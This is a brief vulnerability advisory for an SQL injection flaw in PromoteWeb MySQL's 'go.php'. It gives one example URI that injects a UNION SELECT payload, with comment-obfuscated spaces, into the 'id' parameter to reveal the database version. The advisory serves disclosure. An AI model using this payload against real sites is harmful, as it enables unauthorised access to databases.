PromoteWeb MySQL 'go.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

PromoteWeb MySQL 'go.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/[promote]/go.php?id=1'/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8/**/FROM/**/promote/**/WHERE/**/No='1